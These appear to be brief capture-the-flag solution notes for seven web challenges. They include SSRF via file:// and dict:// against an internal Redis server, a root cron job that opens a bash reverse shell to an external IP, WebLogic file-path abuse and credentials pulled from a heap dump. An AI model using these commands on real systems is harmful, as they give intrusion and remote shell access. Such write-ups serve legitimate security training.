WEB1
flag1
The flag is in the root directory, so read the file with a pseudo-protocol (URL scheme)
file:///flag
flag2
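It exists here as well
The hint says it is in the database, and there is also an internal network range, 172.18.240.0/24
Since no specific IP is given,
test each address separately and look at the returned page
The host should be 7
Brute-force the ports
Redis on 6379
List the keys
Get the value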
dict://172.18.240.7:6379/GET flag
flag3
Still 6379
Reverse shell
Write a scheduled task (cron)
dict://172.18.240.7:6379/config set dir /var/spool/cron/
dict://172.18.240.7:6379/config set dbfilename root
dict://172.18.240.7:6379/SET x "\n\n* * * * * /bin/bash -c '/bin/bash -i >%26 /dev/tcp/118.178.135.162/8888 0>%261'\n\n"
nc -lvnp 8888
dict://172.18.240.7:6379/SAVE
WEB2
flag1
WebLogic on port 7001
flag2
/uddiexplorer/oracle_logo.gif
./servers/AdminServer/tmp/_WL_internal/uddiexplorer/5f6ebw/war/oracle_logo.gif
. /root/Oracle/Middleware/user_projects/domains/base_domain
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/uddiexplorer/5f6ebw/war/
Commands cannot be executed
Found in /root/Oracle/Middleware/user_projects/domains/base_domain/config/jdbc/JDBC_Data_Source-0-3407-jdbc.xml
WEB3
flag1
Use JDumpSpider-1.1-SNAPSHOT-full.jar (of course, flag1 is also in the env directory)
flag2
[password = MeetSec@2nd!2022, driverClassName = com.mysql.jdbc.Driver, url = jdbc:mysql://mysql_heapdump:13306/db, username = meetsec]
meetsec/MeetSec@2nd!2022
WEB4
cms
meetsec
2446d54c2e68d221db9cff65
WEB5
Weak password
WEB6
Solved instantly with a tool
WEB7
Log in with the default password / a weak password
JG/RsuIKp3DFaBfD3ctgeA==